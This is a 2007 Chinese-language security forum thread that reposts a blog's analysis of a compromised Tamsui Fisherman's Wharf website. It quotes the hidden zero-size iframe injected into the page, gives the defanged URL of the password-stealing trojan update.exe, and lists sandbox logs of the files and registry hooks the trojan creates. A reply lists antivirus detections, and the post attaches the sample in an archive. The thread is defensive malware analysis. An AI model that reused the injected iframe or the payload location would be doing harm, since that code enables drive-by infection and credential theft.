【木馬】淡水漁人碼頭網站被植入惡意連結 - PCZONE 討論區

返回   PCZONE 討論區 > ▲ ADSL_CABLE_FTTH 寬 頻 上 網 討 論 > -- 防 駭 / 防 毒 版


PCZONE 討論區



通知

-- 防 駭 / 防 毒 版 不論你是使用固定 IP 或是 DHCP 一定都有機會被無聊的駭客入侵 , 來這裡跟大家作防駭以及防毒的心得與資訊分享。

會員
【木馬】淡水漁人碼頭網站被植入惡意連結
轉自大砲開講
http://rogerspeaking.blogspot.com/20...post_3071.html

被植入惡意連結的網站
hxxp://www.fisherman.com.tw/

網頁code:
引用:
</tr>
</table>

</div>
</body>
</html>
<iframe src=hxxp://www.misofthelp.com/help/help.htm width=0 height=0 frameborder=0></iframe>
但是,他用到US-ASCII,我不會解

所以,我只抓到下面這隻
hxxp://www.misofthelp.com/help/update.exe

運行update.exe,發現下列行為,被EQ-Secure RC4攔截!
引用:
2007-07-13 11:03:08 创建文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\system32\winCreate.exe
触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-13 11:03:08 创建文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\search.dll
触发规则:所有程序规则->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


2007-07-13 11:03:08 创建注册表值 操作:阻止
进程路径:D:\桌面\virus\update\update.exe
注册表路径:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注册表名称:{6F4747B0-4094-4200-A251-866989504B17}
触发规则:所有程序规则->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*


2007-07-13 11:03:08 加载库文件 操作:允许
进程路径:D:\桌面\virus\update\update.exe
文件路径:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\Program Files\Common Files\search.dll
触发规则:黑名单->2.1组:禁止从Temp文件夹运行程序->C:\Documents and Settings\*\Application Data\Sandbox\*
1.他會在C\windows\system32\生成
winCreate.exe
2.他會在C\Program Files\Common Files\生成
search.dll
3.他會创建注册表值
HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{6F4747B0-4094-4200-A251-866989504B17}

4.他會加载库文件
C\Program Files\Common Files\search.dll

有用HIPS測試的人,可以看update.exe是否會"安裝全局鉤子"?

有人可以教我,US-ASCII要如何解碼嗎?

上傳的附加檔案
檔案類型: rar update.exe及其生成物.rar (187.7 KB, 23 次觀看)

此篇文章於 2007-07-13 12:03 PM 被 Roger 編輯。.
回覆
Bad Boy
回覆: 【木馬】淡水漁人碼頭網站被植入惡意連結
這個地址,木馬作者一直在用,樣本一直在更新,真佩服作者的毅力。
[Found possible virus] <W32/PWStealer1!Generic> \update.exeAndsons\drive\C\Program Files\Common Files\search.dll
[Found possible virus] <W32/PWStealer1!Generic> \update.exeAndsons\drive\C\windows\system32\winCreate.exe
[Found possible virus] <W32/PWStealer1!Generic> \update.exeAndsons\update.exe

回覆







 XML   RSS 2.0   RSS 
本站使用 vBulletin 合法版權程式
站務信箱 : [email protected]

本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。